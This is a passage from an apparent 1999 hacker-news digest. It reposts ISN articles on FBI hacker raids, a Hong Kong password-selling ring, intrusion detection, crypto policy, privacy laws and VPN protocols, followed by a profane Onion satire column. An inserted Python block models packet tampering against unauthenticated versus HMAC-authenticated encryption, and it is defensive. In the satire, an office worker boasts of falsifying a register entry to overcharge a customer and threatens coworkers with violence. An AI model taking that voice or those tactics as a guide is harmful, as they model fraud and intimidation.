He said the agents confiscated a computer, some diskettes, CD-ROM's and other computer paraphernalia. Two Internet service providers have also received requests for documentation in connection with the case. The requests, parts of which have been posted on the Internet, seek information about dozens of hackers, hacker groups and software used by hackers. John Vranesevich, who operates the Anti-Online Web site, which chronicles hacker activity, said the information requested from Internet service providers involved software tools, computer files and aliases pertaining to hacker activities. Vranesevich said several of the aliases actually represented software programs called "bots," which are posted in chat rooms as automated monitors but may have been mistaken by F.B.I. agents for human participants. "Anything that has to do with hackers they're going after," he said. "I'm not going to call this a witch hunt, but it's an uninformed investigation." Meanwhile, hacker groups continued attacks on corporate and Government computers, in some cases making sites inaccessible and, in others, taking over sites with their own messages, some of them profane. The F.B.I. site, taken down last week, remained inaccessible yesterday. One hacker group, which calls itself F0rpaxe, says it is based in Portugal and takes responsibility for "massive attacks" on various Web sites, sent a statement to Anti-Online saying, "If the F.B.I. doesn't stop we won't, and we can start destroying."

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

49.0 [ISN] Hong Kong Computer Hacking Syndicate Smashed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

www.infowar.com 6/1/99

Hong Kong Computer Hacking Syndicate Smashed

HONG KONG, CHINA, 1999 MAY 30 (Newsbytes) -- By Staff Writer, IT Daily. Hong Kong police arrested an organized group of computer hackers last week, seizing computers and CD-ROMS, after a five-month hunt.
The arrests marked the first time an organized hacking group has been arrested in Hong Kong. Acting on complaints from several local Internet service providers (ISPs) that the accounts of their clients might have been hacked late last year, officers from the Computer Crime Section of the Commercial Crime Bureau (CCB) launched investigations in January, culminating in a series of raids last week. Two men, including a suspected hacker and a middleman, were arrested in the first two days of the operation starting on May 20. In all, ten men were arrested. The suspects were aged between 16 and 21 and included three hackers, six buyers of the passwords and a middleman who arranged the sales. Operating as a syndicate, the hackers stole the passwords and personal information on legitimate Internet account holders and sold them. The principal hacker collected information on over 200 accounts and sold them through a middleman to users who wanted cheap, unlimited Internet access. Hilton Chan, head of the Computer Crime Section of the CCB told ITDaily.com that most of the end-users wanted to use the time to access online gaming sites. According to police, the buyers paid HK$350 (US$45.13) each for a month's access, and clocked up Internet time worth between HK$2,000 and HK$3,000 ($257.88 and $386.82) each. Most local ISPs charge under HK$150 ($19.34) per month for unlimited usage, but users must still pay HK$1.98 ($0.26) per hour for the Public Non-Exclusive Telecommunications (PNETS) license fee. The middleman communicated with its clients through telephone and the ICQ online messaging service. Investigations also showed that one of the hackers set up a Web page on the Internet offering pirate music CDs for sale. Each disk featured over 100 songs downloaded from the Internet or dubbed from copyrighted computer disks. The disks were selling for HK$88 ($11.35) each or HK$160 ($20.63) for two copies.
Ten sets of computers and peripheral equipment believed to be used in the hacking and about 700 CD-ROMs were seized during the operation. Chan said that the maximum penalty is five years' imprisonment. He also advised users to protect themselves against hackers. "Don't store your password on the computer terminal, and change your password more frequently," advised Chan. He also advised users not to use easy to replicate passwords and be careful when downloading from the Web. "If you don't know the source of it don't download it," Chan said.

Exchange Rate: $1 = HK$7.75

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

50.0 [ISN] New Tools Prevent Network Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.nytimes.com/techweb/TW_New_Tools_Prevent_Network_Attacks.html

June 3, 1999

New Tools Prevent Network Attacks
Filed at 8:49 a.m. EDT

IT managers alarmed by high-profile security breaches are gaining new software tools to ward off network attacks. Axent Technologies this week will release an intrusion-detection system with improvements to protect networks against a range of existing and new types of attacks in real time. Internet Security Systems (ISS) will roll out a souped-up version of its RealSecure system that filters out false alarms from real attacks with greater efficiency and precision. Other vendors said they plan product updates by year's end. CyberSafe, for example, will deliver security features that detect intrusions in individual applications. The advancing functionality of these high-tech burglar alarms comes as Internet-based computing exposes security vulnerabilities. Recent hacker attacks on the FBI and other government websites, as well as the loss of sensitive nuclear weapons information to China, have heightened corporate awareness of the need for multiple layers of network security.
As intrusion-detection systems "enter their midlife, they are starting to become a viable part of the total protection strategy in many corporations," said Mike Hagger, vice president of network security at Oppenheimer Funds. The investment company uses ISS' RealSecure to identify and respond to certain types of hacker attacks, such as SYN flood attacks. "Intrusion detection is only one line of defense," Hagger added, citing the need for firewalls, antivirus and authentication tools. Jim Patterson, director of security at service provider Level 3 Communications, agreed, saying intrusion-detection systems must move beyond simple event detection to behavioral analysis. If an intruder is using a "valid ID or password, the typical system wouldn't pick that up as wrong behavior," he said. IT managers also need tools that will help them build a baseline of typical usage patterns. Thus, if a user tried to access a network at 2 a.m., for example, an IT manager would be notified. "I want to get details on what things are being accessed and what systems are being used," Patterson said. For Electronic Data Systems, intrusion detection could be the first line of defense. The IT services provider is testing Axent's NetProwler 3.0 on the access point into the network -- outside the firewall, said Wayde York, a network operations supervisor at EDS. By placing NetProwler at the network perimeter, it can detect "stealth scans and newer attacks" that the firewall typically won't pick up, he said. Placing the intrusion-detection system in front of the firewall also reduces the false alarms common to these network-based systems, York said, because it's less likely to have to monitor a wide variety of traffic types, as it would inside the firewall.
NetProwler 3.0 also can send alerts to Check Point Software Technologies' Firewall-1 product -- which EDS uses -- once an attack is detected so that the firewall could then be reconfigured to fend off future attacks of the same type, York said. Tighter integration between NetProwler and Axent's host-based Intruder Alert system lets IT managers monitor network devices and servers from Intruder Alert's central management console. Protecting mixed platforms and critical resources is the goal behind ISS' product rollout, scheduled for the week of June 14.

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

51.0 [ISN] U.K. Crypto Policy May Have Hidden Agenda
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.nytimes.com/techweb/TW_U_K_Crypto_Policy_May_Have_Hidden_Agenda.html

June 3, 1999

U.K. Crypto Policy May Have Hidden Agenda
Filed at 5:06 a.m. EDT
By Madeleine Acey for TechWeb, CMPnet

Despite its abandonment of key escrow, the U.K. could be counting on the ignorance of new Internet users to provide law enforcement easy access to private communications, according to privacy campaigners. Following a meeting in London on Wednesday, where ISPs drafted a code of practice for protecting user privacy, ISP and civil liberties groups both derided British and European Union attempts to regulate the use of encryption, caching and unsolicited email. ISP organizations, such as the London Internet Exchange -- or LINX -- described government policy as "extremely stupid," "misguided" and "infeasible." But some said they found it hard to believe incompetence was behind it. LINX chairman Keith Mitchell said the latest version of proposed legislation regarding law enforcement access to encrypted email and computer files was based on a "misguided conception" that ISPs would provide users with encryption.
A senior government official said last week the government expected most warrants demanding keys to encrypted material would be served on service providers. "The only encryption of any use on the Internet is end-to-end. The keys are generated between the users. All the ISP is going to see is an encrypted data stream," Mitchell said. "I still don't know a single Home Office employee that has an email address," he said. But of the encryption warrant policy, he said the government "either doesn't understand or is deliberately misunderstanding." "I think they are deliberate," said Yaman Akdeniz of Cyber-Rights & Cyber-Liberties. "They don't want to give away what they want to do." He said there was a lot of pressure on lawmakers from the National Criminal Intelligence Service, which wanted easy access. "The Home Office believes users will go to [third parties], like the Post Office, to get keys," said Nicholas Bohm, spokesman for the Foundation for Information Policy Research. "They should not be promoting a policy where private keys are generated by anybody but the user." He, along with Akdeniz, said it was possible the government was planning to create a new market, favorable to easy law enforcement access, where new Internet users -- unaware of the tradition of free user-to-user encryption -- would go to "trusted third parties" for encryption services because they were endorsed by the government as safe. "If these new services are there, many people will use them," Akdeniz said.

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

52.0 [ISN] Tackling E-Privacy in New York
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded
From: Dan Moniz

Tackling E-Privacy in New York
by Chris Oakes

If the federal government won't get tough with the issue of online consumer privacy, New York state is determined to do it.

The New York State Assembly has passed the part of a legislative package designed to erect unprecedented privacy safeguards for consumer information in the information age.

"The more you learn about computers and email and ordering and passing information by email and the Internet, the more people realize that laws that protect them in different venues are not in place on the Internet," said Assemblywoman Audrey Pheffer.

Pheffer, a Democrat from Queens, is head of the Consumer Affairs and Protections Committee and author of several measures in the legislative package, considered the most comprehensive state action on consumer privacy to date.

Fourteen bills passed last week are expected to pass committee and reach the assembly floor as early as this week. The New York Senate plans to present its own privacy package this summer.

The broad-ranging measures grew out of the increasing availability of personal information. The bills target privacy invasions that the assembly said could lead to everything from personal financial loss and damaged credit ratings to discrimination.

The authors blame the new risks on computers and Internet use, and modern technology in general, which threaten privacy with everything from DNA advances to the widespread selling and distribution of digital information.

"We had to do this because three to five years ago we never thought when we passed legislation that this would be something we'd have to deal with -- the theft of identity, the selling of email information, the selling of digital photo images," Pheffer said.

The bills require confidentiality of personal records, prevent the selling of email addresses without consent, and prohibit various sophisticated telemarketing tricks enabled by modern technology.

"We tried to deal with the many issues we and the attorney general have received complaints on," Pheffer said.

Whereas consumers used to worry about the theft of a credit card or a driver license, Pheffer said that the dangers of information theft are much greater.

"[A thief] can steal everything so that they [can] become you. We've had stories where people had automobiles ordered [in their name] and just by luck were able to actually stop the delivery of the car. It's much more than the stealing of a credit card."

Identity theft is enabled by electronic access to home addresses, social security numbers, and the like, Pheffer said.

The new legislation isn't just targeted at data collected by thieves. It places companies under scrutiny, too.

"As technology provides more efficient ways for commercial enterprises to gather and distribute information to consumers, it is vital that the laws of the state be modernized to ensure personal privacy," said Attorney General Eliot Spitzer in a statement. Spitzer is one of the primary authors and presenters of the legislative package.

Spitzer said that the legislation he authored will strengthen the individual's control over personal information.

Privacy experts and advocates are enthused.

"The New York legislation package is very, very exciting," said Paul Schwartz, a law professor at Brooklyn Law School. "I think that this is something that is going to shift power to people on the Internet, and increase the transparencies of [privacy] policies [online]."

"It's not surprising that states are moving when Washington policy legislators are largely sitting on their hands," said Marc Rotenberg, executive director of the Electronic Privacy Information Center.

Existing federal measures to protect consumer privacy are largely directed at children. The Federal Trade Commission is charged with protecting privacy, but it can only bring limited civil actions.
Critics charge that the US Commerce Department has failed to put its teeth behind consumer privacy because the Internet industry has successfully lobbied the agency that the associated costs of such a move would threaten the nation's lead in global e-commerce.

In a privacy hearing in Washington last week, Rotenberg said that Congress showed itself to be inactive on the issue.

"Everyone sat back and said 'Oh, it looks like self-regulation is working [and we] don't need to do anything.... By and large, I think the states have not been very impressed. So now they're dealing with wide range of issues."

New York has been a state leader in areas of consumer protection and privacy protection, Rotenberg said.

But Rotenberg noted that the potential impact of the various bills on Internet activity is still unclear.

"By and large, the bills really target activity off the Internet," Rotenberg said. "[They] treat the Internet as one of many privacy issues."

Still, one of the measures in the package would add a prohibition of the sale, lease, or exchange of any consumer's email address and any other personal identifying information that might be obtained online without a consumer's consent.

Jason Catlett, of the online privacy watchdog group Junkbusters, is especially pleased with that measure. But he and others caution that the statewide reach of the legislation is one caveat for anyone hoping for far-reaching impact.

"Most privacy advocates and experts would prefer to see broad federal legislation for the protection of personal data," said Catlett. "But some of these piecemeal measures may prevent some very specific injuries that consumers are suffering daily."

Still, he said that some of the bills have a "private right of action, which allows individual consumers to sue companies that invade their privacy." That principle has worked well in telemarketing legislation and deserves to be extended to personal data protection, he said.
@HWA

53.0 [ISN] Congress, NSA butt heads over Echelon
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: Putrefied Cow
Originally
From: 7Pillars Partners

Congress, NSA butt heads over Echelon
BY DANIEL VERTON (dan_verton@fcw.com)

Congress has squared off with the National Security Agency over a top-secret U.S. global electronic surveillance program, requesting top intelligence officials to report on the legal standards used to prevent privacy abuses against U.S. citizens.

According to an amendment to the fiscal 2000 Intelligence Authorization Act proposed last month by Sen. Bob Barr (R-Ga.), the director of Central Intelligence, the director of NSA and the attorney general must submit a report within 60 days of the bill becoming law that outlines the legal standards being employed to safeguard the privacy of American citizens against Project Echelon.

Echelon is NSA's Cold War-vintage global spying system, which consists of a worldwide network of clandestine listening posts capable of intercepting electronic communications such as e-mail, telephone conversations, faxes, satellite transmissions, microwave links and fiber-optic communications traffic. However, the European Union last year raised concerns that the system may be regularly violating the privacy of law-abiding citizens [FCW, Nov. 17, 1998].

However, NSA, the supersecret spy agency known best for its worldwide eavesdropping capabilities, for the first time in the history of the House Permanent Select Committee on Intelligence refused to hand over documents on the Echelon program, claiming attorney/client privilege.

Congress is "concerned about the privacy rights of American citizens and whether or not there are constitutional safeguards being circumvented by the manner in which the intelligence agencies are intercepting and/or receiving international communications...from foreign nations that would otherwise be prohibited by...the limitations on the collection of domestic intelligence," Barr said.
"This very straightforward amendment...will help guarantee the privacy rights of American citizens [and] will protect the oversight responsibilities of the Congress which are now under assault" by the intelligence community.

Calling NSA's argument of attorney/client privilege "unpersuasive and dubious," committee chairman Rep. Peter J. Goss (R-Fla.) said the ability of the intelligence community to deny access to documents on intelligence programs could "seriously hobble the legislative oversight process" provided for by the Constitution and would "result in the envelopment of the executive branch in a cloak of secrecy."

@HWA

54.0 [ISN] Visa, Wells Fargo Deliver E-Payment Alternatives
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded
From: darek milewski

Visa, Wells Fargo Deliver E-Payment Alternatives

New Options for handling credit card transactions over the Web are emerging as cheaper and simpler alternatives to the dormant SET standard.

As merchants continue to call for SET alternatives, two financial services giants--credit card company Visa International and online banking leader Wells Fargo & Co.--are trying a new approach: issuing digital certificates for use in SSL-based sessions.

Visa, which co-developed SET with MasterCard International, will now let banks issue RSA Data Security X.509 digital certificates to merchants and will provide those banks with data collection, authorization, routing and settlement services for Internet transactions through its new Visa Payment Gateway.

The gateway, to go live this summer, gives merchants using the Visanet point-of-sale network access to that same network through Web channels. That means there's no legacy-systems integration required by Visa USA's 6,000 member banks, many of which have characterized the Secure Electronic Transactions (SET) protocol as a gamble because of the implementation costs.

Visa's gateway arrives just one week after Wells Fargo said it will offer merchants e-commerce services that combine Secure Sockets Layer (SSL) encryption with digital certification. Wells Fargo has partnered with GTE's CyberTrust business unit to issue digital certificates to merchants.

While both Visa and Wells Fargo still support SET, the moves underscore the difficulties that SET has faced. Few merchants and banks have installed SET-enabled systems because of their cost and complexity. In fact, less than 1 percent of U.S. merchants polled by Forrester Research said they are using or plan to use SET on their sites. Also, consumers have little incentive to use the e-wallet applications that SET requires, analysts said.
Today, most Web storefronts protect credit card data using SSL encryption but do not validate users' identities with digital certificates.

-- Jeffrey Schwartz

http://www.internetwk.com/story/INW19990602S0002

@HWA

55.0 [ISN] Protocols serve up VPN security
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded
From: darek milewski
http://www2.nwfusion.com:8001/cgi-bin/print.cgi?article=http://www.nwfusion.com/news/tech/0531tech.html

Protocols serve up VPN security
By GREG MARCOTTE
Network World, 05/31/99

As the need to securely open corporate LANs to telecommuters and disparate corporate sites grows, virtual private networks (VPN) continue to meet the demand. VPNs - which establish private, secure sessions between two or more LANs or between remote users and a LAN - use the Internet or private IP networks to distribute data and enable corporations to eliminate additional, often expensive, dedicated lines or remote access servers.

Today, network executives must weigh two protocols that specify how VPNs should be built. The Point-to-Point Tunneling Protocol (PPTP) and IP Security (IPSec) protocol enable private sessions over the Internet and securely link remote users to corporate networks. The protocols also possess relative strengths and weaknesses in data security and ease of deployment. Network managers must determine which VPN protocol best suits the need of their organizations.

[Diagram of how PPTP works]

PPTP vs. IPSec security

Spearheaded by Microsoft and US Robotics, PPTP was first intended for dial-up VPNs. The protocol was meant to augment remote access usage by letting users dial in to local ISPs and tunnel into their corporate networks. Unlike IPSec, PPTP was not intended to address LAN-to-LAN tunneling when it was first created.

PPTP extends PPP - a protocol that defines point-to-point connections across an IP network. PPP is widely used to connect dial-up and broadband users to the public Internet or private corporate networks. Because PPP functions at Layer 2, a PPTP connection that encapsulates PPP packets allows users to send packets other than IP, such as IPX or NetBEUI. IPSec, on the other hand, functions at Layer 3 and is only able to provide the tunneled transport of IP packets.

The encryption method commonly used in PPTP is defined at the PPP layer.
Typically, the PPTP client is the Microsoft desktop, and the encryption protocol used is Microsoft Point-to-Point Encryption (MPPE). MPPE is based on the RSA RC4 standard and supports 40-bit or 128-bit encryption. Although this level of encryption is satisfactory for many applications, it is generally regarded as less secure than some of the encryption algorithms offered by IPSec, particularly 168-bit Triple-Data Encryption Standard (DES).

Protect and serve

Meanwhile, IPSec was built for secure tunneling over the Internet between protected LANs. It was meant for a connection with a remote office, another LAN or corporate supplier. For instance, a large automotive company could use an IPSec VPN to securely connect its suppliers and support purchase orders over the 'Net.

IPSec also supports connections between remote users and corporate networks. Similarly, Microsoft added LAN-to-LAN tunneling support for PPTP in its Routing and Remote Access Server for Windows NT Server 4.0.

When it comes to strong encryption and data integrity, IPSec is generally regarded as superior. The protocol combines key management with support for X.509 certificates, information integrity and content security. Furthermore, 168-bit Triple-DES encryption, the strongest form of encryption available in IPSec, is more secure than 128-bit RC4 encryption.

IPSec also provides packet-by-packet encryption and authentication and prevents the "man-in-the-middle attack," in which data is intercepted by a third party, reconstructed and sent to the receiver. PPTP, however, is vulnerable to such assaults, primarily because it authenticates sessions but not individual packets. Note, however, that mounting a successful man-in-the-middle attack against a PPTP connection would take considerable effort and know-how.

For many corporations, the ability to run PPTP from the Windows platform (it supports Windows NT, 95 and 98) can make deploying and maintaining a VPN seamless.
For others, PPTP is perceived as less secure than IPSec. It is important to bear in mind, however, if deploying a VPN for remote users, IPSec requires an organization to load specialized client software on each desktop. Client software deployment and maintenance are a weighty undertaking that must be considered. In terms of simplicity, PPTP is substantially easier to deploy.

@HWA
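The distinction drawn in section 55.0 between authenticating a session and authenticating every packet, shown as an added Python example (not code from the Network World article or from any VPN product). The packet layout, key names, HMAC-SHA256 tag and the strictly increasing sequence check are assumptions of this model, not the PPTP/MPPE or IPSec wire formats; the sample payload is constructed.

```python
import hashlib
import hmac
import struct

TAG_LEN = 32  # HMAC-SHA256 output size (model assumption, not an IPSec transform)


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4, the cipher the article says MPPE is based on; encrypt == decrypt."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # keystream generation, XORed into the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def packet_key(enc_key: bytes, seq: int) -> bytes:
    """Per-packet RC4 key so that no keystream is reused across packets."""
    return hashlib.sha256(enc_key + struct.pack(">I", seq)).digest()


def seal_encrypt_only(enc_key: bytes, seq: int, payload: bytes) -> bytes:
    """Model A: peer authenticated once at setup, packets only encrypted."""
    return struct.pack(">I", seq) + rc4(packet_key(enc_key, seq), payload)


def open_encrypt_only(enc_key: bytes, packet: bytes) -> bytes:
    """Receiver for model A: decrypts whatever arrives; nothing to verify."""
    seq = struct.unpack(">I", packet[:4])[0]
    return rc4(packet_key(enc_key, seq), packet[4:])


def seal_per_packet(enc_key: bytes, mac_key: bytes, seq: int, payload: bytes) -> bytes:
    """Model B: every packet carries a MAC over sequence number + ciphertext."""
    body = seal_encrypt_only(enc_key, seq, payload)
    return body + hmac.new(mac_key, body, hashlib.sha256).digest()


class PerPacketReceiver:
    """Receiver for model B: verifies the MAC, then the sequence number."""

    def __init__(self, enc_key: bytes, mac_key: bytes):
        self.enc_key, self.mac_key = enc_key, mac_key
        self.highest_seq = 0  # senders start at 1; simplified, no replay window

    def open(self, packet: bytes) -> bytes:
        if len(packet) < 4 + TAG_LEN:
            raise ValueError("truncated packet")
        body, tag = packet[:-TAG_LEN], packet[-TAG_LEN:]
        expected = hmac.new(self.mac_key, body, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):  # constant-time comparison
            raise ValueError("integrity check failed")
        seq = struct.unpack(">I", body[:4])[0]
        if seq <= self.highest_seq:
            raise ValueError("replayed or out-of-order packet")
        self.highest_seq = seq
        return open_encrypt_only(self.enc_key, body)


def flip_bit(packet: bytes, index: int) -> bytes:
    """Model an in-transit change: invert the lowest bit of one byte."""
    changed = bytearray(packet)
    changed[index] ^= 0x01
    return bytes(changed)


def demo() -> dict:
    enc_key, mac_key = b"constructed-enc-key", b"constructed-mac-key"
    payload = b"QTY=0100;ITEM=4711"  # constructed purchase-order field
    results = {}

    # Model A: a packet altered in transit decrypts without any error.
    altered = flip_bit(seal_encrypt_only(enc_key, 1, payload), 4 + 4)
    results["encrypt_only"] = open_encrypt_only(enc_key, altered)

    # Model B: the clean packet is accepted, altered and replayed copies are not.
    receiver = PerPacketReceiver(enc_key, mac_key)
    good = seal_per_packet(enc_key, mac_key, 1, payload)
    results["clean"] = receiver.open(good)
    for name, packet in (("altered", flip_bit(good, 4 + 4)), ("replayed", good)):
        try:
            receiver.open(packet)
            results[name] = "accepted"
        except ValueError as err:
            results[name] = str(err)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:13} {value}")
```

In model A the receiver hands a changed quantity field to the application with no error; in model B the same change and a replayed copy are both rejected before decryption.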
http://come.to/Canc0n99

SYSTEM NEWS: Canc0n99 is looking for more speakers and industry people to attend with booths and talks. you could have a booth and presentation for the cost of little more than a doorprize (tba) contact us at our main address for info hwa@press.usmc.net, also join the mailing for updates. This is the first Canadian event of its type and will have both white and black hat attendees, come out and shake hands with the other side... *g* mainly have some fun and maybe do some networking (both kinds). see ya there!

@HWA

HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! .............

Scarfed from PacketStorm via The Onion;

I Am a Bad Ass
By Herbert Kornfeld
Accounts Receivable Supervisor

YO, waaasssuuup, baby? H-Dog is back, and don't nobody fuck with this BADASS. You wanna fuck me, motherfucker? You gonna wish you didn't. 'Cause I the Accounts Receivable supervisor of Midstate Office Supply, and I AM a cold-blooded badass motherfucker, and if you fuck with me I'll go stone cold crazy on your ass. Like that motherfucker Steve Englebreiter of Associated Publishing House.
Asshole thought he could postdate his goddamn check on a bill that was overdue for nearly a month and a half. I caught it right before we was ready to deposit it. Don't tell me it was no mistake; cocksucker knew what he was doing all along. Know what I did? Sent the goddamn thing right back along with a note saying we be passing his account along to a collection agency in two weeks if his bitch ass didn't pay up. Now, legally, we only supposed to notify our collection agency after 90 days, not a month and a half. But I didn't have to tell the fool that. Three days later cocksucker sends us a cashier's check via overnight mail for the full amount. Ain't nobody fucks with my badass self. Or take that ol' bitch Mildred Fladner who's always callin' up, bitchin' about her credit balance. "Those staplers only cost $36.50 for the half-dozen, not $38.50. Your cashier rung it up wrong." Then how come you didn't notice it then, y'ol ho? She high and everybody know it, but she make such a big deal about knowing the company president and everything she got everybody runnin' scared. Except this BAD ASS. So I go downstairs to the register she bought the staplers at, reset the date, duplicate the cashier number and purchase number, and ring the goddamn shit up at $39.50. Then I call her back sayin' I found the original detail tape and check it out, it looks like you owe us a dollar additional, plus extra sales tax, your own receipt must have come out poor. A week later I get a payment for the full amount, with her apologies. I pocket the extra buck and change, spend it on a lotto ticket, and win five bucks. It's payback time for that bitch. Now don't be messin' me up with the Accounts Payable Supervisor. The Accounts Payable Supervisor, he ain't no badass. Hell, he ain't even no man. His name is Myron or something, and he so old he can't even get it up no more. I gots a bitch in the cash room. Myron, everybody laugh at him.
He supposed to be the one that got the money but everybody know I got it and it's no even my job. If I ever see you within even six feet of the coffee machine I'll Bruce Lee on your sorry ass. Mister Coffee, he my man. 'Cause only I know the perfect proportion: two and three eighths scoops of Folgers to three and one quarter cups of water. Ain't no use trying to do it yourself 'cause you'll just fuck it up; only I can do it right. 'Cause I got Kung Fu Grip. You got a problem with that? I got a problem with your existence, motherfucker. I was fucking your mother while you were still watching Fat Albert in yo' Underoos. I don't answer to nobody. One day I be blastin' the phat beats, and the company president come up to me and say, "Herbert, the Muzak is too loud, please turn down the receiver." I say, "I need my tunes when I be preparing account statements." Then he say, "I don't care, turn it down, it's distracting." So you know what I do? After he leaves for the day I steal a shitload of mints from his desk. He gets the message, and he don't give me no trouble no more. I be fucking his wife on the sly, anyhow. So don't fuck with this H-Dog Daddy Mack Mack Daddy Comin' Out Your Ass Badass, 'cause if you do I be comin' after you like pastrami on rye to whip your muthafukin' sorry ass. I mean it. Don't. Fuck. With. Me. ------------------/--------------- Keep Your Fucking Shit Off My Desk By Herbert Kornfeld Accounts Receivable Supervisor Yo, yo, yo, yo, yo, bruthahs 'n' sistahs. H-Dog here, His Stone Cold Baadness, The Original Gangsta, The Mack Daddy, The Freaky Gangbanga. And I got somethin' to say to all y'all bitches out there: Keep yo' motherfuckin' shit offa my desk, or I'll fuck your sorry ass up wit' a quickness. And I don't want to see y'all comin' around, puttin' your feet on it, neither. Or puttin' your goddamn coffee cups on it and leaving them fucked-up rings all upside the wood and shit. 'Cause I keep my fly shit on my desk. 
I gots my dope spreadsheets, my hangin' file folders, my delinquent-account file, my paper clips, my Post-It note dispenser, my monthly desk planner, my Midstate Office Supply business cards, my four-color ball-point pen, my motherfuckin' dot-matrix printer address labels, and my stoopid-fresh three-hole punch. Not to mention my computer. I swear, if I see any of y'all within three feet of my computer, I'll put a Lee Van Cleef on your bitch ass. I'll come at you like a mother fuck. I'm just trying to keep it real, know what I'm sayin'? I wanna stop the violence before it starts. I could say nothin' and wait in the shadows like some motherfuckin' ninja, and when some punk-ass temp worker come along and start readin' my "Attitude Is A Little Thing That Makes A Big Difference" Successories mouse pad, I could jump out and knock the sucka's teeth the fuck out. 'Cause that would be my right. A man's gotta protect what's his, right? Take what happened just last week. Judy Metzger, this li'l skank-ass ho from Accounts Payable, be runnin' her ass around the office, puttin' cupcakes wit' the goddamn smiley faces and shit on people's desks. I'm like, "Whus this smiley-face shit y'all be puttin' on my desk?" And she's like, "I made cupcakes for everyone in the office last night!" Now, I don't take shit from nobody, and I sure as hell don't take no shit from some bitch from Accounts Payable, so I picks up my letter opener and do some crazy kung-fu shit on her. "Flag yo' ass outta here, bitch, and keep yo' fuckin' cupcake shit offa my fly desk." She go runnin' out of the room and go gets her supervisor, Myron Schabe, from across the hall. Like I'm supposed to be scared of that. Myron older than shit and he wear bow ties like he Pee Wee Muthafuckin' Herman or somethin'. So then he come up to my cubicle and say, "Herbert, I think there's been a misunderstanding. It was Judy's turn this week to bring in a treat." 
I tell him I don't like no bitches from Accounts Payable puttin' no shit on my desk. But this Myron fool keep pushin' it, tellin' me: "It was meant as a nicety, Herbert, nothing else. It's Co-Worker Appreciation Month, and everybody's scheduled to bring in a treat. You yourself are signed up for next Wednesday." So you know what I tell him? I says, "I ain't gonna be bringing in no motherfuckin' treat, motherfucker. Treats is for old ladies in the nursing home and shit. And ain't nobody gonna be layin' they smiley-face bullshit on my dope fly desk. I gots everything where I want it, and ain't no little ho gonna be fuckin' it all up. So take yo' bitch-ass, bow-tie self and get the fuck out of my cubicle before I cut you, beee-yaatch!" After that, Myron walk out of there wit' his li'l dick between his legs. Ain't no Accounts Payable supervisor motherfucka gonna tell Herbert Kornfeld what to do. And no one else, for that matter. You put shit on my desk, you just signed your death warrant. I mean it. Heads will get flown. H-Dog out. And to all my homies in Accountz Reeceevable and the bruthahs kickin' it down in Shipping, keep ya heads up. Peace. ------------------/------------------ I Be The Real Employee Of The Month By Herbert Kornfeld Accounts Receivable Supervisor Yo yo yo yo, whassssuuup, G's. H-Dog in tha house, and you'll pardon me if I dispense with the usual formalities, but I'm out for muthafuckin' REVENGE. You see, some dirty cocksucka dared fuck with me, Tha Stone Cold Funky-Fresh Bad-Ass Of Accountz Reeceevable. I swear, before I sign out for lunch today I'm gonna Hong Kong on that sorry fool's ass. I'm gonna cut him a permanent smile wit' my Letter Opener Of Death. I'm serious. Heads will get flown. The shit came down yesterday morning, when Gerald Luckenbill, head comptroller at Midstate Office Supply, called a big-ass meeting to announce the Employee Of Tha Month. 
I figure, this meetin' gonna be real short, 'cause everybody knows who be the best employee at Midstate Office Supply--ME. Hell, I already got me so many Employee Of Tha Month plaques on my desk, I need a bigger muthafuckin' cubicle. So you know what that bitch-ass Luckenbill do? He give the muthafuckin' Employee Of Tha Month plaque to muthafuckin' Phil Weinstein from customer muthafuckin' service. Luckenbill say Weinstein got chosen because of "his outstanding service to the company and the gracious and courteous manner in which he always treats the customers." That's bullshit, man. Weinstein only got chose Employee Of Tha Month 'cause his supervisor, Sandra Schumacher, wanna ride his cock. I don't need no dust-crotch supervisor ho wantin' to freak my ass, 'cause I be my own muthafuckin' supervisor, and I don't answer to nobody. I be the real Employee Of Tha Month. Everybody think, ol' Herbert, he don't deserve no Employee Of Tha Month award. He ain't got no shit on nobody. But think again, suckas. Shit gets done when I'm around. Ain't nobody balance more spreadsheets in a pay period than me. I coordinate the second-shift check-processing schedule like a mother fuck. Bills be sent. I even do shit I don't need to do. Like when Rose Powell, that head payroll bitch from Human Resources, quit, I helped that department out, 'cause Human Resources manager Bob Cowan don't know shit about payroll and woulda fucked it all up. All this, and I'm goin' to night school. I be just three credits away from my two-year accounting degree, and Midstate be payin' my tuition, besides. If that all wasn't enough, the second-floor vendin' machine even stopped servin' up them nasty muthafuckin' nut rolls 'cause of me. You see, last Tuesday, the man from Karlsen Vending came by to restock the vending machine, and I said to him, "You better stop loadin' this thing with them skank-ass Pearson's Nut Rolls if you know what's good for you, cocksucka." And just like that, he stopped. Why? 
